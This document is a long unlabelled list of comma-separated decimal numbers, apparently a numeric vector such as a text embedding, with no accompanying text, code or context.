-0.026848046109080315, -0.007778441533446312, 0.002977594966068864, 0.005959012545645237, 0.010282067582011223, -0.010756036266684532, 0.01901991479098797, -0.005324505735188723, -0.008202720433473587, 0.017383957281708717, -0.004540928173810244, 0.02048768848180771, -0.016864119097590446, 0.003539477474987507, 0.027016228064894676, -0.018821151927113533, -0.02921788953244686, -0.0011380987707525492, -0.009991570375859737, 0.019096361473202705, -0.060882072895765305, -0.00865375529974699, -0.003734416328370571, 0.02499803714454174, -0.021557940170168877, 0.01660420186817646, -0.006746412254869938, -0.020029008388519287, -0.01326348539441824, 0.013393444009125233, 0.0011457434156909585, -0.01206327322870493, -0.05222831666469574, -0.006715833675116301, -0.030257564038038254, 0.021145129576325417, -0.036358002573251724, -0.0127360038459301, 0.04941508173942566, -0.03229104354977608, -0.02692449279129505, -0.012132075615227222, -0.03657205402851105, 0.0005934167420491576, -0.011765131726861, -0.009678139351308346, -0.009517601691186428, 0.026267051696777344, -0.016328994184732437, 0.01579386740922928, -0.03455386310815811, -0.010603142902255058, 0.018759995698928833, -0.032841458916664124, -0.016221968457102776, 0.03222988545894623, -0.09528303891420364, 0.013278773985803127, -0.017750900238752365, -0.012713069096207619, -0.018515367060899734, -0.014089108444750309, -0.004345989320427179, -0.00973929651081562, -0.030853847041726112, 0.016053786501288414, -0.0008189341751858592, 0.011833933182060719, -0.017047591507434845, 0.021282732486724854, 0.006157773546874523, 0.0022781086154282093, -0.010519051924347878, -0.014020306058228016, -0.012491374276578426, -0.007189802825450897, 0.028973260894417763, -0.003636946901679039, 0.0011610327055677772, 0.02323976717889309, 0.025716636329889297, 0.05498039349913597, 0.0031113766599446535, -0.04559275135397911, -0.036358002573251724, 0.000035416276659816504, 0.008821937255561352, 0.01830131560564041, -0.023041004315018654, 0.00399051234126091, -0.0000687422143528238, -0.005423886235803366, 0.0041778068989515305, 0.006310666911303997, 0.0076523046009242535, -0.019555039703845978, 0.009907479397952557, -0.008386191911995411, -0.02733730338513851, 0.042687781155109406, -0.0219554640352726, 0.032352201640605927, 0.0041778068989515305, -0.03874313831329346, 0.01713932678103447, 0.02106868289411068, -0.027490196749567986, 0.0118568679317832, -0.023836050182580948, 0.03421749919652939, 0.024753408506512642, -0.02822408452630043, 0.008225654251873493, 0.016573622822761536, -0.021726123988628387, 0.016328994184732437, -0.009594048373401165, -0.017705032601952553, -0.02629763074219227, 0.05027128383517265, -0.01517464965581894, -0.034645598381757736, -0.00601634755730629, 0.03519601374864578, -0.002939371857792139, -0.006268620956689119, 0.0321381501853466, -0.04883408918976784, 0.009250038303434849, -0.0026813645381480455, -0.00033851509215310216, 0.00486964825540781, -0.018438920378684998, 0.05452171340584755, 0.021083971485495567, -0.015113492496311665, 0.011810999363660812, 0.00302919652312994, 0.012789515778422356, -0.008164497092366219, -0.04131174087524414, -0.015113492496311665, 0.050791122019290924, 0.0547051876783371, -0.007793731056153774, 0.009945702739059925, -0.018561234697699547, 0.05063822865486145, -0.03831503540277481, 0.005676160100847483, 0.0064368038438260555, 0.032719146460294724, 0.015342832542955875, 0.036938995122909546, -0.02657283842563629, -0.001734382240101695, 0.04519522935152054, -0.01742982491850853, 0.00789693370461464, 0.00017463270341977477, 0.02230711840093136, -0.015098202973604202, -0.021374469622969627, -0.04155637323856354, 0.009968636557459831, -0.041403479874134064, -0.0323827788233757, -0.010626077651977539, -0.013049434870481491, 0.005519444588571787, -0.024340597912669182, -0.031954679638147354, -0.01602320745587349, -0.06415398418903351, -0.02417241409420967, -0.008294455707073212, 0.011252939701080322, -0.03103731945157051, -0.05687627196311951, 0.04173984378576279, -0.024569937959313393, -0.017796767875552177, 0.012713069096207619, 0.009043633006513119, -0.037642303854227066, -0.004086070694029331, 0.033942289650440216, -0.016160810366272926, -0.003480231389403343, 0.041464634239673615, 0.004716755356639624, -0.019814958795905113, 0.0038280633743852377, 0.03599105775356293, -0.01557981688529253, -0.05011839047074318, -0.010068017058074474, -0.020976947620511055, -0.015006467700004578, 0.03715304657816887, 0.012269679456949234, -0.010771325789391994, 0.022138934582471848, 0.022842243313789368, 0.010419671423733234, -0.02429473027586937, -0.013003566302359104, -0.03360592573881149, -0.0018547856016084552, -0.030425745993852615, 0.025334402918815613, 0.016588911414146423, 0.026955071836709976, -0.018179001286625862, -0.003554766997694969, 0.00460590748116374, 0.02235298603773117, 0.015686841681599617, 0.010641366243362427, -0.015747999772429466, -0.026419945061206818, -0.024386465549468994, -0.0031687114387750626, -0.02036537416279316, -0.013737454079091549, 0.00003708854637807235, 0.049843184649944305, 0.02375960350036621, 0.02346910536289215, -0.012162653729319572, 0.036113373935222626, -0.022842243313789368, -0.01736866682767868, -0.027123253792524338, -0.013607494533061981, 0.036235686391592026, -0.015541593544185162, -0.017093459144234657, 0.023805471137166023, -0.013989727944135666, 0.018148422241210938, -0.03901834413409233, 0.004800846334546804, -0.019845537841320038, 0.019493883475661278, 0.005855809431523085, 0.016802962869405746, 0.02505919523537159, -0.025624901056289673, -0.0024271795991808176, 0.01819428987801075, 0.039171237498521805, 0.019340990111231804, 0.012315547093749046, 0.03128194808959961, -0.013156459666788578, -0.011451700702309608, -0.03550180047750473, -0.012980632483959198, 0.0018767639994621277, -0.02365257777273655, 0.01666535809636116, 0.014715970493853092, -0.007713461760431528, -0.012659557163715363, 0.017643874511122704, -0.0031668003648519516, -0.020441820845007896, 0.008646110072731972, 0.04112827032804489, -0.031067898496985435, 0.00033278160844929516, -0.04436960816383362, 0.010022149421274662, 0.02187901735305786, 0.0066126310266554356, -0.0011294984724372625, 0.012781871482729912, 0.014647168107330799, -0.017475692555308342, -0.009838677011430264, 0.014326092787086964, -0.005806119181215763, 0.040761325508356094, -0.01246844045817852, 0.022811666131019592, -0.0014782861107960343, 0.013897991739213467, -0.0010377626167610288, -0.04033322632312775, 0.00278838980011642, -0.004980496130883694, 0.0036560585722327232, 0.004173984285444021, -0.023621998727321625, 0.03155715763568878, -0.03501254320144653, -0.003833797061815858, 0.0011036978103220463, -0.017643874511122704, 0.020334795117378235, 0.0010110063012689352, -0.0017764278454706073, 0.0062609766609966755, -0.0160079188644886, 0.00012888418859802186, -0.0038949542213231325, -0.017857925966382027, 0.017796767875552177, -0.027597222477197647, -0.008928962983191013, 0.027429040521383286, 0.01964677684009075, -0.024952169507741928, 0.009509957395493984, 0.0011973448563367128, 0.008370902389287949, -0.006467382423579693, 0.01141347736120224, 0.01643601804971695, -0.015992628410458565, 0.009983926080167294, 0.009586403146386147, -0.009861611761152744, 0.02013603411614895, -0.004789379425346851, 0.008707267232239246, -0.012353770434856415, -0.03455386310815811, 0.025686057284474373, 0.006004880182445049, -0.043513406068086624, 0.00865375529974699, -0.0014610856305807829, 0.0003093698469456285, -0.008607886731624603, -0.04161752760410309, 0.04397208243608475, 0.01924925297498703, 0.0288662351667881, 0.04066959023475647, -0.0007453543366864324, 0.012391993775963783, -0.018087266013026237, -0.002004812005907297, 0.027597222477197647, -0.018821151927113533, 0.02224596031010151, 0.026129446923732758, -0.047855570912361145, 0.021282732486724854, 0.0019474771106615663, 0.013500469736754894, 0.01865296997129917, -0.008110984228551388, -0.01720048487186432, -0.01517464965581894, -0.023148030042648315, -0.01557981688529253, 0.04993491992354393, 0.0015470880316570401, -0.0357770100235939, -0.03210757300257683, 0.03070095367729664, 0.04424729198217392, 0.0007066532270982862, 0.016680648550391197, -0.009724007919430733, 0.019279832020401955, 0.008676689118146896, -0.020992236211895943, -0.0047243996523320675, -0.03281088173389435, 0.003451563883572817, -0.002503626048564911, 0.007594969589263201, 0.03317782282829285, 0.01730751059949398, -0.01355398166924715, -0.004097537603229284, 0.01871412806212902, 0.01877528429031372, 0.022903401404619217, -0.010129174217581749, 0.056356433779001236, 0.026312919333577156, -0.019814958795905113, -0.024753408506512642, -0.022628193721175194, 0.0031037318985909224, -0.007193624973297119, 0.0014515297953039408, 0.012231456115841866, -0.009089500643312931, -0.008791359141469002, -0.0009407709585502744, 0.025135641917586327, 0.005641758907586336, -0.008133918046951294, -0.005469754338264465, 0.01995256170630455, 0.01369923073798418, -0.0011638994328677654, -0.030196405947208405, 0.016940565779805183, 0.04513407126069069, -0.006647031754255295, 0.005829052999615669, 0.0017171817598864436, 0.002423357218503952, 0.01308765821158886, -0.0035432998556643724, -0.03755056858062744, 0.00320502370595932, 0.007468832656741142, 0.0019350545480847359, -0.03959934040904045, -0.032413359731435776, 0.03204641491174698, -0.003671347862109542, 0.043329931795597076, 0.03767288476228714, 0.027214989066123962, -0.050699383020401, 0.02224596031010151, -0.006325955968350172, -0.008997764438390732, -0.008088050410151482, -0.006803747266530991, 0.005381840746849775, -0.000793133454862982, 0.00097708310931921, 0.028499292209744453, 0.024753408506512642, -0.00983103271573782, -0.016176100820302963, -0.00619217474013567, 0.006822858937084675, -0.027826562523841858, -0.006658498663455248, -0.014272579923272133, 0.012950054369866848, 0.021603809669613838, -0.03360592573881149, -0.004158695228397846, 0.003845263971015811, -0.01097008679062128, -0.014540143311023712, -0.01567155309021473, -0.02518150955438614, -0.02681746706366539, -0.052381210029125214, 0.007250959984958172, -0.026542259380221367, -0.01549572590738535, 0.014853574335575104, 0.011046533472836018, 0.010083306580781937, -0.015090558677911758, -0.02999764494597912, 0.007629370782524347, 0.02047239989042282, -0.013194683007895947, 0.009785165078938007, 0.015151715837419033, -0.0009694384643808007, 0.004670887254178524, 0.0219554640352726, 0.012269679456949234, -0.003701926674693823, 0.027979455888271332, -0.017628585919737816, -0.00711335614323616, -0.027214989066123962, -0.0021118372678756714, 0.0073847416788339615, -0.04085306450724602, 0.020793475210666656, 0.01387505792081356, 0.014777127653360367, 0.008791359141469002, -0.05391014367341995, -0.019692644476890564, -0.003627391066402197, 0.031710051000118256, -0.009395287372171879, 0.0045332834124565125, -0.022674061357975006, -0.008386191911995411, 0.021145129576325417, 0.023270344361662865, 0.011474634520709515, 0.031174924224615097, 0.0005881609977222979, 0.009716362692415714, -0.012177943252027035, 0.018026107922196388, -0.013760387897491455, 0.0034324522130191326, 0.009043633006513119, -0.027077386155724525, -0.014570721425116062, 0.021496783941984177, -0.024325307458639145, -0.0030444858130067587, 0.040700171142816544, 0.03433981165289879, 0.046510111540555954, -0.03761172667145729, -0.007178335916250944, -0.019876115024089813, 0.01496824435889721, -0.03345303237438202, -0.001718137296847999, 0.015342832542955875, -0.0006082282634451985, -0.003109465353190899, 0.01188744604587555, -0.01666535809636116, -0.009456444531679153, 0.028269952163100243, -0.014326092787086964, -0.02441704459488392, -0.006723478436470032, 0.016160810366272926, 0.008149207569658756, -0.014242001809179783, -0.011405833065509796, 0.04085306450724602, 0.0107942596077919, -0.019814958795905113, -0.022031910717487335, 0.0021443271543830633, 0.008921317756175995, -0.020992236211895943, 0.0272914357483387, -0.04008859768509865, 0.022979848086833954, -0.00751087861135602, -0.005156323313713074, 0.028193505480885506, 0.008263877592980862, 0.023224476724863052, 0.01602320745587349, 0.01282009482383728, -0.02363728918135166, 0.01146699022501707, 0.021664965897798538, 0.0010052727302536368, 0.013737454079091549, -0.0025705168955028057, -0.05063822865486145, 0.01123765017837286, 0.00776315201073885, 0.003451563883572817, 0.008409125730395317, -0.00641004741191864, -0.0118568679317832, 0.007086599711328745, 0.004109004512429237, 0.004261897876858711, 0.03115963377058506, -0.015388700179755688, 0.02230711840093136, -0.00663174269720912, 0.007713461760431528, -0.027841851115226746, 0.03519601374864578, -0.0060239918529987335, 0.000991894630715251, -0.01573270931839943, -0.010098596103489399, -0.008240943774580956, -0.0162525475025177, -0.004678532015532255, 0.006654676515609026, -0.009234748780727386, -0.009234748780727386, 0.02018190175294876, 0.024631094187498093, 0.010786615312099457, 0.005645581521093845, 0.0007534768083132803, -0.008584952913224697, -0.02964599058032036, -0.014356671832501888, 0.0008772247238084674, -0.011826288886368275, 0.03519601374864578, 0.004353633616119623, -0.020640581846237183, 0.009731652215123177, 0.03755056858062744, 0.006754057016223669, -0.009081856347620487, -0.028331110253930092, 0.009418221190571785, -0.011367609724402428, -0.01422671228647232, -0.01571742072701454, 0.01724635250866413, -0.0002974250528495759, -0.04617374762892723, -0.02840755693614483, -0.008562019094824791, 0.0042657204903662205, 0.02946252003312111, 0.035410065203905106, -0.01443311758339405, 0.0028705697041004896, 0.0008662355248816311, 0.015342832542955875, 0.021848438307642937, -0.0329943522810936, -0.012177943252027035, -0.028881525620818138, -0.02259761467576027, 0.0015671552391722798, 0.007124823052436113, 0.011031243950128555, -0.05170847848057747, -0.0005384707474149764, 0.02223067171871662, 0.034523285925388336, -0.003589167958125472, -0.021680256351828575, -0.015855025500059128, -0.004923161119222641, -0.0011868334840983152, -0.003082709154114127, 0.01953975111246109, 0.0016780028818175197, -0.017276931554079056, -0.005725850351154804, 0.030532771721482277, -0.020747607573866844, -0.011895091272890568, 0.019402146339416504, 0.013401089236140251, -0.011757487431168556, 0.0035413887817412615, -0.03855966404080391, -0.005504155065864325, 0.005007252097129822, -0.008294455707073212, 0.02382075972855091, 0.0060087027959525585, 0.036021638661623, -0.002992884488776326, 0.007659949362277985, -0.012483729980885983, 0.011031243950128555, 0.013164104893803596, -0.04473654925823212, -0.03599105775356293, 0.007373274303972721, -0.029493097215890884, 0.016298415139317513, 0.004789379425346851, -0.008202720433473587, 0.008179786615073681, -0.0126442676410079, 0.004808491095900536, 0.015702132135629654, -0.02628234028816223, 0.012277323752641678, -0.013187038712203503, -0.0323827788233757, -0.002117570722475648, 0.003933177329599857, -0.000601061386987567, -0.0019551217555999756, -0.004453014582395554, 0.014180844649672508, 0.012529597617685795, -0.009838677011430264, 0.005007252097129822, -0.007197447121143341, -0.04825309291481972, -0.035593535751104355, -0.006776990834623575, -0.02557903155684471, 0.0047205775044858456, 0.017231063917279243, -0.024141836911439896, -0.014417828992009163, -0.011841578409075737, 0.00965520553290844, 0.02223067171871662, 0.008691978640854359, -0.029707148671150208, -0.013492824509739876, 0.00803453754633665, 0.017475692555308342, -0.03996628150343895, -0.003979045432060957, -0.03831503540277481, -0.012751292437314987, -0.009662849828600883, 0.002635496435686946, 0.006020169705152512, 0.03901834413409233, -0.0016608024016022682, 0.011902735568583012, -0.009379997849464417, -0.0366332121193409, -0.00632213382050395, -0.018622390925884247, -0.02258232608437538, 0.01918809674680233, 0.0466935820877552, -0.011283517815172672, 0.012567820958793163, -0.016925277188420296, -0.003724860493093729, 0.02235298603773117, -0.018637681379914284, -0.0018624302465468645, 0.014601300470530987, -0.002897326136007905, 0.017445113509893417, -0.04424729198217392, 0.02183314971625805, 0.022138934582471848, -0.002356466371566057, -0.0358993224799633, 0.0009359930409118533, -0.028331110253930092, -0.03785635530948639, 0.0037076601292937994, 0.02218480408191681, 0.014517209492623806, -0.012628978118300438, 0.0160690750926733, 0.002799856709316373, 0.019203385338187218, -0.003986690193414688, 0.0066279200837016106, -0.031144345179200172, 0.018087266013026237, 0.026863334700465202, -0.01970793306827545, 0.021053394302725792, -0.016466597095131874, -0.007029264699667692, 0.028254663571715355, 0.017353378236293793, 0.0504547543823719, -0.0055806017480790615, -0.01742982491850853, -0.006757879629731178, -0.010740747675299644, 0.0038834873121231794, 0.02551787532866001, -0.020380662754178047, -0.0013741275761276484, 0.025013327598571777, -0.0021003703586757183, -0.010855416767299175, 0.008661399595439434, 0.007591147441416979, 0.01906578242778778, -0.005978124216198921, -0.004345989320427179, 0.03437039256095886, -0.027138542383909225, -0.026374077424407005, 0.011757487431168556, 0.056478746235370636, 0.0020755252335220575, -0.026450524106621742, -0.0067617017775774, -0.007789908442646265, 0.0030043513979762793, 0.017934372648596764, -0.0019627665169537067, 0.021924884989857674, -0.01387505792081356, 0.02024305984377861, -0.018179001286625862, 0.04115884751081467, -0.018698837608098984, -0.004502704832702875, 0.012093852274119854, -0.0044606588780879974, -0.014035595580935478, -0.007568213157355785, -0.0081568518653512, -0.012621333822607994, -0.014410183764994144, -0.0030693309381604195, -0.022811666131019592, -0.035532377660274506, -0.009823388420045376, -0.01203269511461258, 0.008913673460483551, 0.00017487160221207887, -0.0007582547259517014, 0.009219460189342499, 0.01343931257724762, -0.0016894699074327946, -0.0042771873995661736, 0.014631879515945911, -0.010037438943982124, 0.012453150935471058, -0.001923587522469461, -0.020625293254852295, -0.012827739119529724, -0.0321381501853466, -0.024783987551927567, -0.018867021426558495, 0.008409125730395317, -0.027474908158183098, 0.01772032119333744, 0.012147365137934685, -0.013102946802973747, 0.021756703034043312, -0.014073818922042847, -0.015304609201848507, -0.013775677420198917, -0.018438920378684998, -0.0003005306934937835, -0.005959012545645237, 0.007820487022399902, 0.014532499015331268, 0.08580366522073746, -0.013508114032447338, 0.002404245547950268, -0.007124823052436113, 0.01666535809636116, 0.002201662166044116, -0.008340324275195599, 0.016283126547932625, 0.0026297629810869694, 0.011719264090061188, 0.01484593003988266, -0.009051277302205563, 0.01567155309021473, 0.01794966123998165, 0.007293005473911762, 0.009372353553771973, -0.014639523811638355, -0.0026641639415174723, 0.025670768693089485, -0.009257683530449867, 0.013286419212818146, 0.009930413216352463, 0.01246844045817852, -0.012659557163715363, 0.031710051000118256, -0.01414262130856514, -0.04537869989871979, -0.04247372969985008, -0.034186918288469315, -0.020518267527222633, 0.0029909731820225716, -0.02658812701702118, -0.03696957603096962, -0.003657969878986478, 0.007805197965353727, 0.007109533995389938, 0.042871251702308655, -0.005725850351154804, -0.01256017666310072, -0.0006478849099949002, 0.00006491988460766152, -0.02768895775079727, -0.008049827069044113, 0.01496059913188219, -0.014478986151516438, -0.01683354191482067, 0.030823269858956337, 0.021282732486724854, -0.005163967609405518, 0.012789515778422356, 0.016466597095131874, -0.024095967411994934, 0.035348907113075256, 0.02588481828570366, -0.008179786615073681, 0.014624234288930893, -0.01912693865597248, -0.021557940170168877, -0.00025920174084603786, -0.008539085276424885, 0.006417692173272371, 0.010786615312099457, -0.008202720433473587, 0.022903401404619217, -0.010175042785704136, -0.008218009024858475, -0.02664928510785103, 0.003866286715492606, -0.025854239240288734, 0.006838148459792137, 0.01654304377734661, 0.0030693309381604195, 0.0006837192922830582, 0.007625548169016838, 0.009983926080167294, 0.016558334231376648, -0.007522345520555973, 0.008783713914453983, -0.0039408220909535885, -0.0002467791782692075, 0.036052215844392776, 0.009509957395493984, -0.00425425311550498, 0.01859181374311447, -0.02470754086971283, 0.012177943252027035, -0.016099654138088226, 0.024799276143312454, 0.0036082793958485126, -0.015449857339262962, -0.0059972358867526054, 0.001273791422136128, 0.0034439193550497293, 0.018637681379914284, 0.006345067638903856, 0.02811705879867077, 0.005110455211251974, -0.0013148814905434847, -0.020151324570178986, -0.013599850237369537, -0.011726908385753632, -0.007086599711328745, 0.02447820082306862, -0.009876900352537632, -0.01837776228785515, 0.01596204936504364, 0.0038395305164158344, 0.02005958743393421, 0.005110455211251974, -0.013515759259462357, -0.022750508040189743, -0.02946252003312111, 0.019233964383602142, -0.006459737662225962, -0.017919082194566727, 0.02758193388581276, 0.008080405183136463, 0.008378547616302967, -0.020197192206978798, -0.029248468577861786, -0.032352201640605927, -0.017108749598264694, 0.0327497236430645, -0.017445113509893417, 0.005622647237032652, 0.01443311758339405, -0.001056874287314713, -0.028086481615900993, 0.02799474447965622, 0.028682764619588852, 0.02441704459488392, -0.003745883470401168, -0.0014371960423886776, 0.0061119054444134235, 0.021022815257310867, -0.03473733365535736, 0.007820487022399902, 0.013691586442291737, 0.016114942729473114, 0.007185980211943388, -0.0022417965810745955, 0.012460796162486076, 0.02635878697037697, 0.001091275247745216, 0.0032986707519739866, -0.008584952913224697, -0.00241380138322711, 0.012896541506052017, 0.027734827250242233, 0.024906301870942116, 0.0032336912117898464, -0.026312919333577156, 0.023790182545781136, 0.013836834579706192, 0.0024730474688112736, 0.0073121171444654465, 0.022689349949359894, -0.02288811281323433, 0.0049575618468225, -0.006073682568967342, 0.016940565779805183, 0.0005322594661265612, 0.024034811183810234, 0.0032241353765130043, 0.021726123988628387, 0.029309626668691635, 0.008195075206458569, -0.030945584177970886, -0.008883094415068626, -0.031373683363199234, 0.013179393485188484, 0.008439704775810242, -0.01267484575510025, 0.01784263551235199, 0.013057079166173935, 0.015189939178526402, -0.028545159846544266, -0.005943723022937775, 0.0431770384311676, -0.003646502736955881, 0.005481221247464418, 0.0164971761405468, 0.009808098897337914, -0.017124038189649582, 0.044400185346603394, -0.028667474165558815, 0.008416770957410336, 0.012369059957563877, -0.03504312038421631, 0.00698339706286788, 0.0048849377781152725, 0.029890621080994606, -0.00868433341383934, -0.017399245873093605, -0.01514407154172659, -0.020686449483036995, -0.024264151230454445, -0.007449720986187458, -0.01041202712804079, -0.007484122179448605, -0.011405833065509796, -0.0004574851191136986, -0.013324642553925514, -0.009028343483805656, -0.0008089005714282393, -0.016695937141776085, 0.01158930454403162, 0.0252885352820158, -0.008179786615073681, -0.004850536584854126, -0.012797161005437374, 0.0015805334551259875, 0.007415320258587599, 0.012216166593134403, 0.006712011527270079, 0.017062881961464882, 0.01164281740784645, -0.02077818661928177, -0.0013244373258203268, -0.0014725526561960578, -0.0160690750926733, 0.008967186324298382, 0.020686449483036995, 0.0013167926808819175, -0.019142229110002518, -0.003688548458740115, 0.03608279675245285, -0.01983024738729, -0.0043689231388270855, 0.015595106407999992, -0.01837776228785515, -0.012262034229934216, -0.016741804778575897, 0.03504312038421631, -0.02840755693614483, -0.0220166202634573, 0.027826562523841858, 0.008821937255561352, 0.020166613161563873, 0.0012336570071056485, -0.01337815448641777, -0.007793731056153774, -0.024569937959313393, -0.006303022149950266, 0.003963756375014782, -0.00017511048645246774, 0.012483729980885983, -0.010832482948899269, -0.005408596713095903, 0.02799474447965622, -0.01276658196002245, 0.007793731056153774, 0.0033904067240655422, -0.009846322238445282, -0.013653363101184368, 0.015870314091444016, -0.02570134587585926, -0.003711482509970665, -0.01755213923752308, -0.023102162405848503, -0.0037802844308316708, -0.0035509446170181036, -0.01496059913188219, 0.010603142902255058, -0.02663399465382099, 0.02271992899477482, -0.029263759031891823, -0.02071702852845192, 0.0015843557193875313, 0.007457365747541189, 0.015220518223941326, 0.0038165964651852846, 0.00684961536899209, -0.021817859262228012, -0.003615924157202244, 0.006264798808842897, -0.007602614350616932, -0.020900500938296318, 0.00491551635786891, -0.007270071655511856, -0.007036909461021423, 0.03788693621754646, 0.0014677747385576367, -0.026160025969147682, 0.0005332150612957776, -0.04583737999200821, -0.018500076606869698, -0.004284831695258617, -0.023255055770277977, 0.0023048650473356247, 0.0017276931321248412, 0.0020124567672610283, -0.011512857861816883, -0.0200137197971344, 0.020258348435163498, 0.0010836306028068066, -0.02593068592250347, 0.025105062872171402, -0.02088521048426628, 0.018500076606869698, -0.003109465353190899, 0.052778732031583786, 0.006459737662225962, -0.007075132802128792, -0.004747333936393261, -0.010832482948899269, -0.027918297797441483, 0.009058921597898006, 0.01545750256627798, -0.023988943547010422, -0.0016244902508333325, -0.02018190175294876, -0.027780694887042046, -0.02171083353459835, 0.005148678552359343, 0.011314096860587597, 0.008691978640854359, 0.0004228452453389764, -0.017873214557766914, 0.014654813334345818, 0.007457365747541189, -0.021282732486724854, -0.01941743679344654, -0.019876115024089813, -0.012659557163715363, 0.012690135277807713, 0.014027951285243034, -0.0018184734508395195, -0.01643601804971695, -0.01830131560564041, 0.011925669386982918, 0.024157125502824783, 0.031129054725170135, -0.004644130822271109, 0.004892582539469004, -0.0030597751028835773, 0.008607886731624603, 0.009043633006513119, 0.010350869968533516, -0.01824015937745571, -0.04531754553318024, 0.007166868541389704, -0.010297357104718685, -0.013974438421428204, -0.0005437264335341752, 0.0011084757279604673, -0.006264798808842897, 0.026098869740962982, -0.0037535279989242554, -0.03703073412179947, 0.0009340819087810814, -0.003917888272553682, -0.0005274815484881401, 0.007109533995389938, -0.007197447121143341, 0.006299200002104044, -0.0082485880702734, 0.01872941665351391, 0.0025514052249491215, -0.04776383563876152, -0.01135996449738741, 0.006211286410689354, -0.0003136699669994414, 0.01311823632568121, 0.02411125786602497, -0.019203385338187218, -0.008355613797903061, 0.0039408220909535885, -0.0037821955047547817, -0.031174924224615097, -0.009785165078938007, 0.01819428987801075, 0.009311195462942123, 0.013324642553925514, 0.02810177020728588, 0.011726908385753632, 0.02018190175294876, -0.015044691041111946, -0.04189273715019226, 0.016390150412917137, -0.011795710772275925, -0.0002525126619730145, 0.0001281675067730248, 0.005679982248693705, -0.0288050789386034, 0.0020525911822915077, -0.01788850501179695, 0.008149207569658756, 0.007407675497233868, 0.015006467700004578, 0.009983926080167294, 0.02212364599108696, 0.02441704459488392, 0.03268856555223465, 0.006841970607638359, 0.005018719471991062, 0.005569134838879108, -0.004862003959715366, -0.03868198022246361, 0.0021863726433366537, 0.02024305984377861, 0.0020984590519219637, -0.017231063917279243, 0.01346989069133997, 0.0013769944198429585, 0.007591147441416979, -0.011558725498616695, -0.007724928669631481, 0.034767914563417435, -0.007273893803358078, -0.00340378494001925, -0.007958090864121914, 0.00486964825540781, -0.005018719471991062, -0.012017405591905117, -0.0028591027949005365, -0.007789908442646265, 0.005725850351154804, -0.034706756472587585, 0.005542378406971693, 0.02522737719118595, 0.011688685044646263, -0.029034418985247612, -0.02634349837899208, 0.007679061032831669, 0.0007076088222675025, 0.013706875033676624, -0.007805197965353727, -0.013240550644695759, -0.01931041106581688, 0.011352320201694965, -0.0009001587168313563, 0.00557677960023284, -0.007407675497233868, 0.011841578409075737, -0.0010444517247378826, -0.02516622096300125, -0.013362865895032883, -0.0030693309381604195, 0.002245618961751461, 0.02123686484992504, 0.00785871036350727, -0.00465177558362484, -0.0070445542223751545, 0.0007071310537867248, -0.00895189680159092, -0.01788850501179695, -0.012070918455719948, -0.016237257048487663, 0.003747794544324279, 0.004315410740673542, 0.0068801939487457275, 0.010656655766069889, 0.018515367060899734, -0.009173591621220112, -0.011122980155050755, 0.017613297328352928, 0.006413869559764862, -0.01364571787416935, -0.004999607801437378, 0.01937156915664673, -0.01935627870261669, 0.026741020381450653, 0.006601163651794195, -0.006478849332779646, 0.014448407106101513, -0.0015212873695418239, 0.001135232043452561, 0.013859768398106098, -0.0032623587176203728, 0.02687862515449524, 0.007010153029114008, 0.014180844649672508, -0.012888896279036999, 0.0008456904906779528, -0.021267443895339966, -0.011382898315787315, -0.011551081202924252, 0.0031553334556519985, 0.009678139351308346, -0.004529460798949003, 0.0320158377289772, 0.011627527885138988, 0.01683354191482067, 0.005274815484881401, 0.0200137197971344, 0.0006115728174336255, 0.0032986707519739866, 0.003449652809649706, 0.005699093919247389, 0.004701465833932161, -0.007873999886214733, -0.010717812925577164, -0.0017420268850401044, 0.02036537416279316, 0.010220910422503948, 0.012323192320764065, 0.02119099721312523, 0.0015872225631028414, -0.004147227853536606, 0.0004988140426576138, -0.008990120142698288, 0.01132174115628004, -0.019402146339416504, 0.02187901735305786, 0.0018996980506926775, -0.001056874287314713, 0.012682490982115269, 0.0253496915102005, -0.011826288886368275, 0.0020984590519219637, -0.00022862311743665487, 0.004678532015532255, -0.010893640108406544, 0.00021655888122040778, 0.014501919969916344, -0.0032451581209897995, -0.008049827069044113, -0.0018691193545237184, 0.0006536184228025377, -0.0032661808654665947, 0.0036541474983096123, -0.011489924043416977, -0.014234356582164764, 0.011252939701080322, 0.008172141388058662, 0.02059471420943737, -0.008791359141469002, -0.008279167115688324, -0.008913673460483551, 0.006310666911303997, 0.006830503698438406, -0.014043240807950497, -0.002224595984444022, 0.01206327322870493, -0.004552395083010197, 0.021817859262228012, -0.003447741735726595, 0.01396679412573576, -0.015640974044799805, 0.013301708735525608, 0.004705287981778383, 0.002652697032317519, 0.015434568747878075, 0.0012155009899288416, 0.0013215705985203385, -0.0027941232547163963, -0.010144463740289211, -0.021863726899027824, 0.015702132135629654, 0.0027253213338553905, -0.007835776545107365, 0.0038949542213231325, -0.0076523046009242535, 0.012155009433627129, -0.0000521986949024722, -0.021817859262228012, -0.0001356927095912397, -0.002337354701012373, 0.0053130388259887695, -0.0061004385352134705, -0.016772383823990822, 0.008577308617532253, 0.010778970085084438, 0.00314004416577518, 0.0021538829896599054, -0.004529460798949003, 0.007266249507665634, 0.01018268708139658, -0.019753800705075264, -0.002547582844272256, 0.009173591621220112, 0.0023067761212587357, 0.01496059913188219, -0.008745490573346615, -0.003231779905036092, -0.009502312168478966, -0.009838677011430264, -0.0005661825998686254, 0.010893640108406544, 0.04088364169001579, -0.011558725498616695, -0.01860710233449936, -0.012728358618915081, -0.009922768920660019, -0.00014751804701518267, 0.01452485378831625, -0.015220518223941326, -0.020915789529681206, -0.019157517701387405, -0.0010998754296451807, 0.03034929931163788, -0.013515759259462357, 0.0015853113727644086, -0.002610651310533285, -0.015365766361355782, -0.010603142902255058, -0.009143013507127762, -0.004904049448668957, 0.014731260016560555, -0.024218283593654633, 0.007801375351846218, -0.0033655615989118814, -0.01405088510364294, -0.014112042263150215, 0.0038185075391083956, 0.033116668462753296, -0.0061883521266281605, -0.003967578522861004, -0.013324642553925514, 0.00010009726975113153, -0.0021405047737061977, -0.008806648664176464, -0.0017047591973096132, 0.009846322238445282, 0.001031073508784175, -0.003197378944605589, 0.004021090921014547, 0.0053130388259887695, -0.04394150525331497, 0.010863061994314194, 0.0028361687436699867, -0.009678139351308346, 0.007705817464739084, -0.009066566824913025, -0.0013855946017429233, 0.007013975642621517, -0.011382898315787315, -0.004938450176268816, -0.0026718087028712034, 0.0024539357982575893, 0.013309353031218052, 0.0163137037307024, 0.022735219448804855, -0.013752743601799011, 0.025900108739733696, -0.015602750703692436, -0.0065247174352407455, -0.00605839304625988, -0.0047243996523320675, 0.0015509104123339057, -0.000677508010994643, -0.01567155309021473, 0.001488797483034432, -0.014242001809179783, 0.010840128175914288, 0.022276539355516434, -0.0014333737781271338, 0.006325955968350172, -0.00011263928900007159, -0.0019704110454767942, 0.02811705879867077, -0.016237257048487663, 